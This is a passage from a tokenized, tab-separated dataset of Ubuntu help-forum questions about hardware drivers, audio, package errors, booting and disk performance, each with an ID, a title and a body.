this and at least say that it failed to act . but passwd works perfectly well , so it 's clearly possible to change passwords from the command line ... one way or the other , it seems like an objective feature deficiency ( `` bug '' ) to me - should i report it , and if so , where ? update : stranger yet - some users are reporting their passwords are changed , and some are reporting they are n't . one user who has two accounts has one password changed , one not . i ran through the file again , checking that all the accounts were there , and then ran it through chpasswd again ... same results ! i 'm baffled . ideas ? update : here 's the command line i 'm now using : cat passwords.txt | chpasswd if i use -s - i see no output - nothing at all ! so it seems to be getting nothing ... but if i just cat the file : cat passwords.txt i get : user : password user2 : hunter2 [ ... etc ... ] more : if i change the first line to be nonuser ( an invalid user ) , i get a perfectly good error : chpasswd : ( user nonuser ) pam_chauthtok ( ) failed , error : authentication token manipulation error chpasswd : ( line 1 , user nonuser ) password not changed so it is in fact reading and processing the file , at least as far as detecting non-users ! oh , and $ ? is 0 .
294449	external mic not always recognized	although this sounds similar to many previous bug reports , i could n't find an answer in the other threads . i have a samsung serie 9 laptop with a single audio connector for headphones/mic . i am using ubuntu 12.04 x86_64 . when i plug a samsung headset with microphone , the system correctly recognizes it and in the sound settings , the input device changes from `` internal microphone '' to `` microphone '' . everything works as it should . however , if i plug an irig ( http : //www.ikmultimedia.com/products/irig/ ) , the system does not detect that the device acts as both headset and microphone , and the sound is still captured from the laptop internal microphone . the output is , on the contrary , played back through the irig . i have successfully used the irig on a desktop computer running the same version of ubuntu by splitting the 4-pin jack into a headphone and microphone jacks with an adapter similar to this : http : //www.startech.com/cables/audio-video/audio-cables/35mm-4-position-to-2x-3-position-35mm-headset-splitter-adapter-f-m~muyhsfmm i also installed pavucontrol . there i could see in the input devices tab both the `` internal microphone '' and `` microphone '' ports , but selecting ether one had no effect on the input device that is actually used by the system . i also tried with alsamixer , but could not find a way to make the external mic active . i suspect this might be related to the electrical properties of the irig compared to the samsung headset . i 'll be happy to submit more information if necessary . thank you for any help ! lspci | grep audio 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) uname -a linux giampi-samsung 3.2.0-39-generic # 62-ubuntu smp thu feb 28 00:28:53 utc 2013 x86_64 x86_64 x86_64 gnu/linux
294451	distribution upgrade at a chosen moment	when the window poped up that told me that 13.04 was released , i clicked on `` install later '' . right now , i have got the time to upgrade but i ca n't find a button where to do it . it used to be in the update manager in previous versions but it has gone . where can i dist-upgrade manually ?
294454	problems with gta san andreas and directx 9.0	i have a problem with gta san andreas . anytime i run the .exe file , a window pops up and it says `` grand theft auto requires at least directx version 9.0 ''
294458	will the msi r7770 work on ubuntu 12.04 ?	i 'm doing my first build and have ubuntu 12.04 successfully up and running . i 've been reading a lot that there are issues trying to use a graphics card , specifically amd . how do i go about installing this graphics card ? should it just be a plug and play ordeal ? do i need to upgrade to 12.10 ? do i need to download some drivers ? thanks all !
294461	how to mount a cd image for installing a program in wine ( beside using cdemu ) ?	i usually use acetoneiso to mount a cd image . i want to install in wine a program that needs a cd in the drive but on a laptop that i use without a cdrom drive . normally the program would recognize the mounted cd image ( mdf ) as such and install . but mounting the image with acetoneiso does n't make the program recognize the mounted image as a cd in drive . the image is mounted , the setup starts from wine , but then the program asks for the cdrom . trying playonlinux and crossover the installation starts but some errors broke the installation process . what is the right way to mount an image for a such purpose and how to do it ? edit for the purpose of reopening this : i have tried the answer to the question to which this was initially set as duplicate . cdemu is the recommended program in that case but it does n't work for me . i guess that it mounts the image so that wine accepts it as a cd in a drive , for the message 'no cd found ' but i get errors anyway and can not install . and i do not know what the cause is and how to find it . i have tried this in wine-proper , in playonlinux and crossover , without success . i would like to test other solutions in order to be able to approximate what the problem is . are there other programs for this purpose ? is there a terminal command to mount the image in a way acceptable for a wine program ?
294464	is there any frame interpolation media player for ubuntu ?	i 'm looking for a media player or converter with frame interpolation support . there are many for windows , but none for ubuntu .
294468	pidgin-libnotify flagged for autoremove -- why ?	after installing network-manager-openvpn via the terminal , pidgin-libnotify was identified as redundant and available for autoremove . did installing openvpn affect my installation of pidgin ? why is it no longer needed ?
294471	how do i find out where are command line commands installed ?	i just installed apt-get install a few commands , but where are these things saved ? thanks
294476	ubuntu 13.04 boot time is 1 min 20 seconds !	i have a lenovo z370 notebook ( i5 ... 6gb ram..750 gb hdd ) and running windows 7 dual boot with ubuntu 13.04 . the boot up is very slow and i have tried many things in this forum ( for e.g disabling unnecessary services upon boot up , preload , reduce swappiness etc etc ) please can someone have a look at the bootchart and the dmesg output and let me know your suggestions ? this part of o/p message is of interest : [ 3.131275 ] kjournald starting . commit interval 5 seconds [ 3.131375 ] ext3-fs ( loop0 ) : mounted filesystem with ordered data mode [ 38.953398 ] adding 262140k swap on /host/ubuntu/disks/swap.disk . priority : -1 extents:1 across:262140k [ 38.983848 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 39.032443 ] ext3-fs ( loop0 ) : using internal journal
294478	problems installing ubuntu	i 've recently tried to do a clean wipe of my old os ( vista ) on my spare pc and go with ubuntu . unfortunately after i download the iso image and use universal usb installer-1.9.3.3 , to format my usb stick for ubuntu . the problem arises here , no errors occur and it says returns a success dialogue , but when reboot and try to boot from the usb , the only thing that happens is that it boots into my current os , and not the ubuntu installer . any help would be greatly appreciated as i 've already spent the better part of my day doing this .
294481	how do i contribute a manual testcase to ubuntu ?	i have a piece of software i like and enjoy using . i want to help make sure the new version is well tested by making a testcase to ensure functionality and prevent regressions . how can i contribute a manual testcase for a package ?
294485	vlc does not play video .	i know this might sound silly , but how the heck do you get vlc to play a movie ? i hear the sound but i have a black screen . is there any other media player like kmplayer or gump ? i’m at my wit’s end here !
294489	why does texmaker install texlive without informing ?	i am using lubuntu 13.04 . i installed texmaker from lubuntu software center , and it downloaded and installed texlive without giving the dependency information before installation . moreover , texlive is not listed in lubuntu software center . so i do n't know what is installed now . is there a way to get all the installed things listed at this situation ? how can i avoid this attitude for further installations and keep my system clean ? thanks ...
294490	apt-get wo n't work	i installed the latest updates from update manger and apt-get wo n't work . i think it has something to do with bumblebee/primusrun due to this error output : installarchives ( ) failed : setting up install-info ( 4.13a.dfsg.1-10ubuntu4 ) ... /etc/environment : line 1 : $ '=\342\200\235primusrun\342\200\235 ' : command not found dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 no apport report written because maxreports is reached already errors were encountered while processing : install-info setting up install-info ( 4.13a.dfsg.1-10ubuntu4 ) ... /etc/environment : line 1 : $ '=\342\200\235primusrun\342\200\235 ' : command not found dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 i am using a dell xps laptop with ubuntu 13.04 .
294491	is there a way to register a gmail account into online accounts	i noticed today , while trying to develop an application for ubuntu , that online accounts does not provide access to gmail ( i mean access to messages , like imap and smtp ) , even though it clearly says in the description of the gmail provider that it does . bug reported , but does anyone know of some way i can do that myself ? a way to extend the google provider to also allow access to gmail ? if there 's no way to extend it like that , can someone point me to clear directions on how to add my own service provider for that , because the official documentation looks different from the real thing ( no such thing as .service-type files , for example ) . thanks .
294498	no hdmi audio from nvidia gt 630 on ubuntu 13.04 ( works on win7 )	i just replaced my gts240 with a gt630 . i could get hdmi audio output from gts240 , but there is no audio device detected on gt630 . ( note that gt630 's hdmi audio works on windows 7 ) the gts240 was connected through spdif , but the gt630 has internal hdmi audio support . this is the lspci output 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 630 ] ( rev a1 ) i am using version 304.88 : [ 18.848686 ] nvrm : loading nvidia unix x86_64 kernel module 304.88 wed mar 27 14:26:46 pdt 2013 the gnome sound config tool shows a `` s/pdif digital output '' that looks like my old gts240 hdmi audio . so , i 'm wondering if there is any way to purage all the previous audio configs and autoconfig everything from scratch ? update : is this bug relevant to my problem ? http : //permalink.gmane.org/gmane.linux.alsa.devel/106245 some more info : $ uname -a linux homeubuntu 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ aplay -l **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 0 : alc887 analog [ alc887 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 1 : alc887 digital [ alc887 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
294501	why the installation fails for this package ? it says linux-headers not found but it is there	this package is failing to get installed , but the linux-headers are installed . root @ sun-alienware-x51 : /var/tmp # uname -a linux sun-alienware-x51 3.5.0-28-generic # 48~precise1-ubuntu smp wed apr 24 21:42:24 utc 2013 x86_64 x86_64 x86_64 gnu/linux root @ sun-alienware-x51 : /var/tmp # dpkg -- list | grep linux-image ii linux-image-3.5.0-28-generic 3.5.0-28.48~precise1 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-generic-lts-quantal 3.5.0.28.35 generic linux kernel image root @ sun-alienware-x51 : /var/tmp # dpkg -i desktopvideo-9.6.9-amd64.deb selecting previously unselected package desktopvideo . ( reading database ... 178666 files and directories currently installed . ) unpacking desktopvideo ( from desktopvideo-9.6.9-amd64.deb ) ... dpkg : dependency problems prevent configuration of desktopvideo : desktopvideo depends on linux-headers ; however : package linux-headers is not installed . dpkg : error processing desktopvideo ( -- install ) : dependency problems - leaving unconfigured processing triggers for hicolor-icon-theme ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : desktopvideo root @ sun-alienware-x51 : /var/tmp # apt-get install linux-headers-3.5.0-28-generic reading package lists ... done building dependency tree reading state information ... done linux-headers-3.5.0-28-generic is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : desktopvideo : depends : linux-headers e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ sun-alienware-x51 : /var/tmp # dpkg -r desktopvideo ( reading database ... 178722 files and directories currently installed . ) removing desktopvideo ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... root @ sun-alienware-x51 : /var/tmp # apt-get install linux-headers-3.5.0-28-generic reading package lists ... done building dependency tree reading state information ... done linux-headers-3.5.0-28-generic is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 134 not upgraded . root @ sun-alienware-x51 : /var/tmp # edit : root @ sun-alienware-x51 : /var/tmp # sudo apt-get -f install linux-headers-3.5.0-28-generic reading package lists ... done building dependency tree reading state information ... done linux-headers-3.5.0-28-generic is already the newest version . linux-headers-3.5.0-28-generic set to manually installed . the following packages were automatically installed and are no longer required : gir1.2-dbusmenu-gtk-0.4 update-notifier-common libgphoto2-l10n libcdio-paranoia1 libgphoto2-port0 libsane-hpaio libraw5 python-reportlab libgexiv2-1 gir1.2-gtk-2.0 python-renderpm acl libxrandr-ltsq2 apport-symptoms libieee1284-3 linux-headers-3.5.0-23-generic libsane-common linux-headers-3.5.0-23 libexiv2-11 gksu libgksu2-0 libart-2.0-2 libcdio-cdda1 hplip-data libllvm3.1 python-reportlab-accel use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 141 not upgraded . edit : root @ sun-alienware-x51 : /var/tmp # apt-get install linux-headers-generic reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-dbusmenu-gtk-0.4 update-notifier-common libgphoto2-l10n libcdio-paranoia1 libgphoto2-port0 libsane-hpaio libraw5 python-reportlab libgexiv2-1 gir1.2-gtk-2.0 python-renderpm acl libxrandr-ltsq2 apport-symptoms libieee1284-3 linux-headers-3.5.0-23-generic libsane-common linux-headers-3.5.0-23 libexiv2-11 gksu libgksu2-0 libart-2.0-2 libcdio-cdda1 hplip-data libllvm3.1 python-reportlab-accel use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-headers-3.2.0-41 linux-headers-3.2.0-41-generic the following new packages will be installed : linux-headers-3.2.0-41 linux-headers-3.2.0-41-generic linux-headers-generic 0 upgraded , 3 newly installed , 0 to remove and 141 not upgraded . need to get 12.7 mb of archives . after this operation , 67.6 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //be.archive.ubuntu.com/ubuntu/ precise-updates/main linux-headers-3.2.0-41 all 3.2.0-41.66 [ 11.7 mb ] get:2 http : //be.archive.ubuntu.com/ubuntu/ precise-updates/main linux-headers-3.2.0-41-generic amd64 3.2.0-41.66 [ 984 kb ] get:3 http : //be.archive.ubuntu.com/ubuntu/ precise-updates/main linux-headers-generic amd64 3.2.0.41.49 [ 2,550 b ] fetched 12.7 mb in 2s ( 6,138 kb/s ) selecting previously unselected package linux-headers-3.2.0-41 . ( reading database ... 191914 files and directories currently installed . ) unpacking linux-headers-3.2.0-41 ( from ... /linux-headers-3.2.0-41_3.2.0-41.66_all.deb ) ... selecting previously unselected package linux-headers-3.2.0-41-generic . unpacking linux-headers-3.2.0-41-generic ( from ... /linux-headers-3.2.0-41-generic_3.2.0-41.66_amd64.deb ) ... selecting previously unselected package linux-headers-generic . unpacking linux-headers-generic ( from ... /linux-headers-generic_3.2.0.41.49_amd64.deb ) ... setting up linux-headers-3.2.0-41 ( 3.2.0-41.66 ) ... setting up linux-headers-3.2.0-41-generic ( 3.2.0-41.66 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.2.0-41-generic /boot/vmlinuz-3.2.0-41-generic setting up linux-headers-generic ( 3.2.0.41.49 ) ... root @ sun-alienware-x51 : /var/tmp # dpkg -i desktopvideo-9.6.9-amd64.debselecting previously unselected package desktopvideo . ( reading database ... 213946 files and directories currently installed . ) unpacking desktopvideo ( from desktopvideo-9.6.9-amd64.deb ) ... setting up desktopvideo ( 9.6.9 ) ... * creating settings directory * adding desktopvideo-9.6.9a9 to dkms * building desktopvideo-9.6.9a9 for kernel version : 3.5.0-28-generic * installing desktopvideo-9.6.9a9 * attempting to load driver * succesfully loaded new driver processing triggers for hicolor-icon-theme ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for libc-bin ... ldconfig deferred processing now taking place root @ sun-alienware-x51 : /var/tmp #
294503	files are locked on ubuntu when copied from my mac or pc	i have installed ubuntu on my old computer , fresh install etc . etc . hope to use it as a central store for media , backups as well as use xbmc on it to play stuff on my tv . problem i am getting at the moment is that when i copy any files over onto the hard drives on the ubuntu machine from either the mac or pc they are locked , and the properties state there is no owner and i ca n't delete them . i have since managed to unlock their properties using nautilus but then when you copy anything new over it again is locked . is there a way of stopping these files being locked by default when they are copied over to the ubuntu machine ? so i dont have to keep going back in and making them unlocked . i am very new to ubuntu and not great with all things command line , so if there is a less command line fix for this it would be greatly appreciated . thanks in advance : )
294509	can i install kubuntu desktop on ubuntu with windows 8 dual boot ?	i have set up dual boot w8 and ubuntu 13.04 and i 'd like to try kde . what steps should i take to install it and also i would like to know if i 'll be able to choose kde from login menu ( currently i have unity and gnome ) also , can this screw up grub2 ?
294510	how can i let somone over ssh have access to pulseaudio ?	i recently had a really good post here where i was able to figure out how to setup virtualgl and use it with x11 forwarding in ssh . i am using it to make a kind of multiseat setup . i only have one sound card at the moment so i am trying to figure out how to let the remote user get access to the sound card over ssh for their gaming . i am only doing soundless stuff on the desktop when they are gaming so i dont need the sound . the problem is the sound only goes to the local user . so to explain better , i am logged in as user1 locally . the user who will be accessing the desktop through ssh is user2 . only things user1 does has sound output , but i want user2 to be able to have access the sound card instead . does anyone know how i can do this ? user2 will be accessing my computer on an ubuntu laptop . also i was wondering if i get a second sound card can i have an audio output going to each of the two users ? thanks for any responses !
294512	setting the default alsa device for pulseaudio	i recently got an external soundcard/dac ( fiio e17 ) and am currently trying to properly configure it on my ubuntu 12.04 installation . when plugging it in via usb , it 's immediately recognized and shows up as a new device in the audio settings . playback works mostly fine as well ( except for some minor volume-related issues , which are beyond the scope of this question ) . however , when trying to test the 24 bit/96 khz playback by playing such an audio file with mplayer , i encountered a small issue : opening audio decoder : [ pcm ] uncompressed pcm audio decoder audio : 96000 hz , 2 ch , s24le , 4608.0 kbit/100.00 % ( ratio : 576000- > 576000 ) selected audio codec : [ pcm ] afm : pcm ( uncompressed pcm ) ========================================================================== ao : [ pulse ] 96000hz 2ch s16le ( 2 bytes per sample ) as can be seen from the output , even though the played file does contain 24 bit/96 khz audio , it 's resampled to 16 bit before playback . playing the same file with aplay shows the reason : playing wave 'sr003-02-2496.wav ' : signed 24 bit little endian in 3bytes , rate 96000 hz , stereo aplay : set_params:1081 : sample format non available available formats : - u8 - s16_le - s16_be - s32_le - s32_be - float_le - float_be - mu_law - a_law however , /proc/asound/card1/stream0 confirms that the hardware does support 24 bit : fiio fiio usb dac-e17 at usb-0000:00:1a.0-1.1 , full speed : usb audio playback : status : running interface = 3 altset = 1 packet size = 388 momentary freq = 44100 hz ( 0x2c.199a ) interface 3 altset 1 format : s16_le channels : 2 endpoint : 3 out ( adaptive ) rates : 32000 , 44100 , 48000 , 96000 interface 3 altset 2 format : s24_3le channels : 2 endpoint : 3 out ( adaptive ) rates : 32000 , 44100 , 48000 , 96000 at this point i noticed that in the hardware tab of the sound settings , i can select two different profiles for the sound card : digital stereo ( iec958 ) and analog stereo . switching between these two does n't result in any changes though , as far as i can tell . specifying the alsa device does help though ( that is , aplay -dhw:1,0 sr003-02-2496.wav works just fine and plays the file without resampling ) . but since pulseaudio only shows one fiio device/sink in the sound settings , i 'm not sure how i 'd tell pulseaudio to use alsa device hw:1,0 . adding load-module module-alsa-source device=hw:1,0 to /etc/pulse/default.pa results in pulseaudio aborting with module.c : failed to load module `` module-alsa-source '' ( argument : `` device=hw:1,0 '' ) : initialization failed . during startup . so , that 's the introduction , here 's my actual questions : how do i figure out which alsa device pulseaudio actually uses when i select the fiio e17 in the sound settings ? how do i tell pulseaudio to use alsa device hw:1,0 when selecting the fiio e17 in my sound settings ? some more ( hopefully helpful ) debug information : the output of aplay -l the output of aplay -l the output of pacmd list-sinks and finally , in case it 's relevant , my .asoundrc
294514	more up to date vim repo	the vim i currently have installed is version 7.3.547 , however i need at least version 7.3.584 . i can not find a repo for a more up to date version . does one exist or must i build vim myself ?
294518	want to take several partitions and create one big one in gparted	basically , i have this mess of partitions and unallocated space on my hard drive , i 'd like to take every one except for /dev/sda1 ( windows 7 ) and create one big partition i can re-install ubuntu on . but i really have no clue what i 'm doing . i format a partition and there is still space being taken on it , i try to remove space from it and it just creates another partition , and i have absolutley no clue how to merge them . here is a screenshot of gparted : any help would be appreciated .
294519	skype not starting on on x64 13.04	having this weird problem with starting up skype ... already tried installing from the debian package , removing skype and reinstalling from debian package , reinstalling from the app market , reinstalling from repository , etc etc.. still no success **error : ld.so : object '/usr/lib/i386-linux-gnu/mesa/libgl.so.1 ' from ld_preload can not be preloaded : ignored . /usr/lib/skype/skype : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64 any advice ? tried the following teemu @ teemupc-715517 : ~ $ ld_preload=/usr/lib32/libgl.so.1 skype skype : error while loading shared libraries : libnvidia-tls.so.319.17 : wrong elf class : elfclass64 yet no luck . : /
294521	keyboard layout and keyboard mapping differ	i installed ubuntu 12.04 on my mid-2011 imac . i set the keyboard layout to canadian multi ( first part ) . if i check the layout on the screen , the mapping is correct . it is also correct in the symbols file ( from usr/shared/x11/xkb/symbols ) . but when i type , in any software , some keys are mixed up . for example , on my keyboard , there 's a '첫 ' between the left shift and the 'z ' key . but it 's showing up as '/ ' . the '/ ' key should be the one left to the '1 ' key , which shows up as '첫 ' . any advice on how to apply correct mapping to my keyboard ? thank you !
294525	what does 'ign ' mean when running an apt-get update ?	i had a bunch of errors in the output of sudo apt-get update : duplicate entries and 404 not found errors . figured those out , i hope : i removed ppas that did n't have any packages associated with them , then i removed out a duplicate entry in /etc/apt/sources.list . it seems i have royally buggered it up . now most of the lines say ign when i do sudo apt-get update . how do i go about straightening out what i have screwed up ? i need to get rid of these igns that are all over the place . there are about 50 % ( eyeball guess ) igns !
294527	how to repair a damaged .doc ( word ) file	( this is lubuntu 13.04 ) i have a damaged .doc ( word ) file , made with abiword . the power went off , and damaged the file . i tried reading it in libreoffice as well . any advice on how repairing this file on ubuntu ?
294533	boot issues after attempting dual-boot setup with windows 8	( i did quite a bit of messing around before asking for help , which in retrospect was a mistake , so the bootinfo might be more useful than my retelling of the events : http : //paste.ubuntu.com/5659500/ ) so , i had been using windows 8 for several months , as it came with my new laptop ( a lenovo ideapad y400 ) , but i decided to try out ubuntu with a dual-boot setup . ubuntu 12.04 simply would n't boot properly off the liveusb ( and i still ca n't get it to work ) , so i got 13.04 . i installed it using the default option for a dual-boot setup , and it worked quite well , but i could never boot windows 8 from grub , which was a minor hassle . i now think that going into the bios and deactivating secure boot might have fixed it , but at the time , i simply got boot-repair and ran it in recommended repair mode . but then windows would n't boot at all , telling me there was an error with windows boot manager , and ubuntu was blocked by security settings or something . i used the recovery partition that came with the laptop and restored windows 8 to its factory condition . since then , i tried installing ubuntu again with a few different partition schemes ( formatting everything but the main windows 8 partition and the other default partitions made by windows 8 and lenovo ) , but no matter what , ubuntu wo n't actually boot . grub works , but when i choose to boot ubuntu , it fails . it also gives me the same error as before when i try to boot windows 8 from grub . i think i might run boot-repair 's recommended repair again , but seeing as it seems to have created some issues the first time around , i thought it best to ask for help first .
294534	running qq : ca n't find python 3.3.1 in apt-get or synaptic	i 'm running qq : ca n't find the repos/packages for python 3.3.1 with apt-get or synaptic . how do i find them and install python 3.3.1 ?
294535	alienware m18xr2 raid slow write ubuntu 12.04 32bit	12.04 32bit alternate installer worked fine for alienware m18xr2 with a raid0 configuration with 2 ssd drives , but writes are slow ! best case is barely more than 1mb/sec , as timed by dd command : dd if=/dev/zero of=./output.img bs=8k count=8k 2108+0 records out 17268736 bytes ( 17 mb ) copied , 13.3313 s , 1.3 mb/s by contrast , read speeds are in the expected range for such a system : sudo hdparm -tt /dev/dm-5 /dev/dm-5 : timing cached reads : 23290 mb in 2.00 seconds = 11661.83 mb/sec timing buffered disk reads : 2184 mb in 3.00 seconds = 727.65 mb/sec similar behavior is noted for io on other devices ( usb drives ) .
294539	turn xubuntu into ubuntu while keeping xubuntu ?	recovering from a terrible attempt to install ubuntu 13.04 , i stumbled upon xubuntu 13.04 . i love it , and so far i have absolutely no complains about it . however , i am not confortable with its default programs . is there a way i can install all default programs ( nautilus , terminal , rhythmbox , open office , etc ) of ubuntu 13.04 and erase all those of xubuntu while keeping the environment ? thanks for your time .
294545	monitor not recognized in ubuntu 13.04 - gateway nv59c	recently upgraded to 13.04 and ubuntu is n't recognizing laptop monitor . i could connect using external monitor and tried the `` mirror '' options . it shows the monitor , but could not make the laptop as the primary to keep the laptop as standalone . i had the similar problem in one of the earlier versions , ca n't recall how i solved . now i 'm struck . any help is appreciated . thanks .
294550	xfce4-places-plugin does n't show mounted partitions due to altered fstab options	to begin with , for some reason i had a problem with wine - every program i launched crashed with a strange error and pretty much nothing would execute except for applications and executables stored on my xubuntu partition . i thought that updating wine would fix the problem but after upgrading to 1.5 i see no difference - the same error occurs over and over again : http : //pastebin.com/rrxsp6ea i think i 've always had similar problems with wine . however , i decided to do some research and a person from another forum claimed that his inability to execute files from partitions with wine was due to a 'users ' option in /etc/fstab . i currently have 1 ntfs partition for windows , 1 ext4 for xubuntu , 1 ext2 and 6 ntfs for file storage and 1 swap partition . all my file storage partitions were configured with a 'users ' option and i removed it . on the positive side , all my executable files would actually execute without an error from every partition i tried . on the negative side , however , i 'm not able to see any of my partitions in the places menu . they are mounted from /dev/sdax to /media/sdax but my places menu does n't show them . it shows only my xubuntu and windows partitions . so far i 've tried altering the fstab options for my ext2 and ntfs partitions a bit by adding a uid and umask and putting ntfs-3g instead of only ntfs but it 's either no exes and visible drives or invisible drives and working exes ( depending on whether the 'user ' or 'users ' option is added ) . if there 's any substitute to the xfce4-places-plugin which would certainly work with xfce4 and show my drives , gtk bookmarks and home folder , i 'd be more than happy to use it . any help is appreciated . thank you in advance ! edit : just downgraded to 1.4.1 because some games and applications seemed blurry and this fixed it but the error still occurs .
294551	disable the confirmation of shutdown	i have upgraded to 13.04 and now when i click on to the setting - . shut-down the is this stupid bar across asking if i want to shut-down , restart etc . this was disables in all my previous versions , via gconf-editor and tweak . i have tried the terminal commands that are posted on the web and all the other information posted . can someone tell me how to remove this stupid microsoft feature , when i cl lick ok to the shut-down button , i want to shut-down otherwise i would have pressed the restart or suspend button . cheers paul
294556	four guis off usb boot	i am booting ubuntu on a mac off of a usb drive . when i start it up there is a black screen giving me the options to try ubuntu , install ubuntu , or 2 other options . i select try ubuntu and four guis show up , one for each corner of the screen . the color in each is relatively faint and the words are unreadable . is there a clear way to fix this ? thanks for the help . imac , late 2009 ; intel core 2 duo processor , 4gb ram .
294559	how to revive wired internet and setup wireless ?	i 'm trying to salvage a laptop long-abandoned by its owner and , just recently , given to me . things were so messed-up that i just had to wipe the slate clean by replacing everything with ubuntu 13.04 . in its post-installation state , it could n't use wireless internet , only wired . i checked the `` software and updates '' window 's `` additional drivers '' tab to find this : - broadcom corporation : bcm4318 [ airforce one 54g ] 802.11g wireless lan controller this device is not working . ( - ) using broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) ( ) do not use the device - unknown : unknown this device is not working . ( ) using non-free firmware for linux kernel drivers from linux-firmware-nonfree ( proprietary ) ( ) continue using a manually installed driver ( - ) do not use the device as can be seen , i had the broadcom driver installed . the problem is that the installation has frozen at 80 % . i 'm thinking that the installation might need some information online to continue , but the laptop has lost its ability to sense the wired internet it is already connected to . how can i make it re-sense the wired internet ? here is the current data on the laptop 's state : ifconfig lo ... ... link encap : local loopback ... ... ... .inet addr:127.0.0.1 mask:255.0.0.0 ... ... ... .inet6 addr : : :1/128 scope : host ... ... ... .up loopback running mtu:65536 metric:1 ... ... ... .rx packets:3291 errors:0 dropped:0 overruns:0 frame:0 ... ... ... .tx packets:3291 errors:0 dropped:0 overruns:0 carrier:0 ... ... ... .collisions:0 txqueuelen:0 rx bytes:267301 ( 267.3 kb ) tx bytes:267301 ( 267.3 kb ) sudo lshw -c network ..*-network:0 unclaimed ... ... .description : ethernet controller ... ... .product : bcm4401-b0 100base-tx ... ... .vendor : broadcom corporation ... ... .physical id : 0 ... ... .bus info : pci @ 0000:03:00.0 ... ... .version : 02 ... ... .width : 32 bits ... ... .clock : 33mhz ... ... .capabilities : pm cap_list ... ... .configuration : latency=64 ... ... .resources : memory : dfdfc000-dfdfdfff ..*-network:1 ... ... .description : network controller ... ... .product : bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ... ... .vendor : broadcom corporation ... ... .physical id : 3 ... ... .bus info : pci @ 0000:03:03.0 ... ... .version : 02 ... ... .width : 32 bits ... ... .clock : 33mhz ... ... .capabilities : bus_master ... ... .configuration : driver=wl latency=64 ... ... .resources : irq:17 memory : dfdfe000-dfdfffff lspci 00:00.0 host bridge : intel corporation mobile 915gm/pm/gms/910gml express processor to dram controller ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 4 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb2 ehci controller ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev d3 ) 00:1e.2 multimedia audio controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ac'97 audio controller ( rev 03 ) 00:1e.3 modem : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ac'97 modem controller ( rev 03 ) 00:1f.0 isa bridge : intel corporation 82801fbm ( ich6m ) lpc interface bridge ( rev 03 ) 00:1f.2 ide interface : intel corporation 82801fbm ( ich6m ) sata controller ( rev 03 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev b3 ) 03:01.1 firewire ( ieee 1394 ) : ricoh co ltd r5c552 ieee 1394 controller ( rev 08 ) 03:01.2 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 17 ) 03:03.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) as to the second device , i am not sure what it is , but the `` continue using ... '' seems to imply that the driver is already there ready to be used , so i am thinking of choosing the second option after the first problem is resolved . would you guys agree ? thanks for your time . take care , kalayaan 001
